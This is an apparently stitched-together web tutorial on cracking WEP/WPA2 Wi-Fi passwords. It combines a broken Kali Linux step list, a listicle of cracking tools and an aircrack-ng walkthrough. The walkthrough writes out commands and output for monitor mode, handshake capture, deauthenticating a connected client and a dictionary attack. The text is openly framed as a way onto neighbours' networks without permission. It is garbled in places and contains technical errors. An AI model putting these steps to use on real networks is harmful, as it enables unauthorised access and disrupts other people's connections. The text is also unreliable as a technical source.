Step By Step How to Crack WPA2 WPA WiFi ( I am using Kali Linux Here ) 1- Boot into Kali Linux. Open Terminal. To check the available devices we can use now. This will show the devices and we have to start airmon-ng to monitor mode on one of these devices probably wlan or wlan0 or wlan1. 3- Enable monitor mode on wireless device. Cracking WPA with oclHashcat Now that we’ve created the password list and captured the WPA handshake we need to store both files in the oclHashcat folder. Next right click the oclHashcat folder and select “Open Command Prompt Here” to open a command line session.
Internet has become one of the most important requirement of today’s life. In fact, for some of us, it is the source of income. With the increasing use of Internet and handy devices like smartphone and tablet and other smart gadgets that make use of internet almost all the things are made available online in digital form.
Gone are the days when people used to stay connected with others using their Internet data pack, To access Internet you need your laptop, desktop or smartphone.
This is the reason people prefer to have wireless connection in homes and offices in order to connect all the devices and work efficiently. Even in your neighbor, school, college or office premises, you must have encountered Wi-Fi networks but it is true that you can’t use them unless you have the correct WiFi password of it. Most of the networks are secured with password key so that no person other than authorized ones could use or access it for free.
Must visit: How To Find Out WiFi Password Of Your WiFi Network
I know how it feels when you are close to any Internet connection and can’t access it because of that password. Even if your own network is down, you desperately want to connect to neighboring Wi-Fi network in order to carry out the tasks.
But can you do anything to get past this? Can you access any Wi-Fi network without password? Well, yes if it is done through good Wi-Fi password cracker software. So, we are going to know about the best software for your Windows PC or laptop to crack Wi-Fi password. Let’s have a look.
Top 5 Wi-Fi Password Cracker Software for Windows
1. Aircrack
Aircrack is one of the most popular wireless password cracking tools that provides 802.11a/b/g WEP and WPA cracking. The software uses best algorithms to recover the password of any wireless network by capturing packets, once the enough packets from any wireless network gathered; the software tries to recover the password.
Aircrack works well with Windows, Linux, OS X, Open BSD, NetBSD, Solaris and more.
2. Smartkey WiFi Password Recovery
This is actually a Wifi password recovery app but you can use WiFi Password recovery as a hacking software to hack WiFi password of a WiFi connection. It is a very powerful WiFi password hacking tool for Windows. The software claims to crack any type of high security WiFi password.
The software provides 5 different attack methods to crack password of a WiFi. The attaks are: dictionary attack, word attack, mask attack, combination attack and hybrid attack to crack the WiFi password.
The dictionary attack tries every word from the dictionary to crack the password. Word attack tries all the anagrams and mutations of a word. Mask attack is used when you have some knowledge of the WiFi password. For example, the length of password, starting letter, ending letter, number of vowels, etc.
Combination attack uses all possible mutations of two words and the hybrid attack tries all the mutations of the dictionary. You can even provide more than one dictionary to crack the WiFi password.
3. Kismet
Kismet is a network detector, packet sniffer and intrusion detection software for 802.11 wireless LANs that supports raw monitoring mode and sniff 802.11a, 802.11b, 802.11g and 802.11n traffic.
Kismet sniffs and captures packets of wireless network in order to determine username and password. You can also use Kismet to identify hidden network and sniff into other connected systems as Kismet features the ability to detect default or non-configured networks and determine what level of wireless decryption needs to be done on a given access point.
Kismet comes with three separate parts, drone to collect the packets of any wireless network, server in connection with drone to interpret packet data and extrapolating wireless information and the client that communicates with server and displays all the information collected by server.
4. AirSnort
AirSnort is a wireless LAN tool which cracks encryption keys on 802.11b WEP networks. This software works well with Linux and Microsoft Windows for decrypting WEP encryption on 802.11b network. AirSnort saves data in two formats. First, all the packets captured by AirSnort is saved in pcap dump file. It also saves data to capture session in the form of crack files.
Running AirSnort is quiet easy, once launched AirSnort must be configured to work with wireless NIC so that it could make attempts to crack password. AirSnort operates by passively monitoring the entire transmissions and computing the encryption key as soon as enough packers are gathered.
5. NetStumbler
NetStumbler basically known as Network Stumbler is Windows tool that detects 802.11b, 802.11a, 802.11g wireless LANs. NetStumbler is used to verify wireless network configuration, detecting cause of wireless interface, detecting unauthorized access points, wardriving, finding location with poor network security and more.
NetStumbler comes with a little disadvantage that it can be easily detected by most of the wireless intrusion detection system.
Do you know about any better WiFi password cracker software? Let me know through comments.
Now a days, We find our neighbour WiFi network but when we try to connect it say to enter password. they are put password in form of WEP or WPA/WPA2. Here is some trick to hack or Crack the wireless/WiFi password using aircrack-ng
Hacking wireless wifi passwords
The most common type of wireless security are Wired Equivalent Privacy (WEP) and
Wi-Fi protected Access (WPA).
WEP was the original encryption standards for wireless so that wireless networks can be secured as
wired network. There are several open source Utilities like aircrack-ng, weplab, WEPCrack, or
airsnort that can be used by crackers to break in by examining packets and looking for patterns in the
encryption. WEP comes in different key sizes. The common key lengths are currently 128- and 256-bit in WEP.
Latter WAP and WAP2 was introduced to overcome the problems of WEP. WAP was based on
security protocol 802.11i replacing the 802.11 of WEP. Using long random passwords or passphrases
makes WPA virtually uncrackable however if a small password is used of less than 14 words it can be
cracked in less than one minute by aircrack-ng, mostly uses passwords of less than 14 words so use aircrack-ng for hacking .
Securing Wireless Network
The first step of securing wireless connection is simply using a long random passwords atleast of
14 characters. Now if your wifi device supports for WPA2 than use it, as many users don’t know that
their device supports for many security encryption techniques. Check your router security techniques supported which is in its configuration page.
If you don’t know how to edit routers setting than just open your browser and type 192.168.1.1 in
addressbar and here you will get your routers configuration, where you can select.
Cracking Wireless Network
As we have read above this is an easy task, we just have to use our network card in monitor mode so
as to capture packets from target network. And this NIC mode is driver dependent and network can be monitored using aircrack-ng. But only small number if cards support this mode under windows.
But you can use live CD of any linux OS (commonly BackTrack ) or install linux OS as virtual machine.
List of compatible cards.
Now download aircrack-ng for linux or windows platform from HERE.
The aircrack-ng suite is a collection of command-line programs aimed at WEP and WPA-PSK key
cracking. The ones we will be using are:
airmon-ng - script used for switching the wireless network card to monitor mode
airodump-ng - for WLAN monitoring and capturing network packets
aireplay-ng - used to generate additional traffic on the wireless network
aircrack-ng - used to recover the WEP key, or launch a dictionary attack on WPA-PSK using the captured data.
Using aircrack-ng
First, put the card in monitor mode :
root@bt:~# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)
Ok, we can now use interface mon0
Let’s find a wireless network that uses WPA2 / PSK :
root@bt:~# airodump-ng mon0
CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet
Stop airodump-ng and run it again, writing all packets to disk :
airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2
At this point, you have 2 options : either wait until a client connects and the 4-way handshake is
complete, or deauthenticate an existing client and thus force it to reassociate. Time is money, so let’s
force the deauthenticate. We need the bssid of the AP (-a) and the mac of a connected client (-c)
root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]
As a result, airodump-ng should indicate “WPA Handshake:” in the upper right corner
CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230
Stop airodump-ng and make sure the files were created properly
root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv
Form this point forward, you do not need to be anywhere near the wireless network. All cracking will
happen offline, so you can stop airodump and other processes and even walk away from the AP. In fact,
I would suggest to walk away and find yourself a cosy place where you can live, eat, sleep, etc.
Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very very long time.
There are 2 ways of bruteforcing : one that is relatively fast but does not guarantee success and one
that is very slow, but guarantees that you will find the key at some point in time.
The first option is by using a worklist/drstionary file. A lot of these files can be found on the internet (e.g.www.theargon.com or on packetstorm (see the archives)), or can be generated with tools such
as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the
worklist and feed it the .cap fie that contains the WPA2 Handshake.
So if your wordlist is called word.lst (under /tmp/wordlists), you can run
aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In
other words, you may get lucky and get the key very fast, or you may not get the key at all.
The second method (bruteforcing) will be successfull for sure, but it may take ages to complete.
Keep in mind, a WPA2 key can be up to 64 characters, So in theory you would to build every
password combination with all possible character sets and feed them into aircrack.
Hope you enjoy(-_-) this post.!
Note: This tutorial is only for Educational Purposes.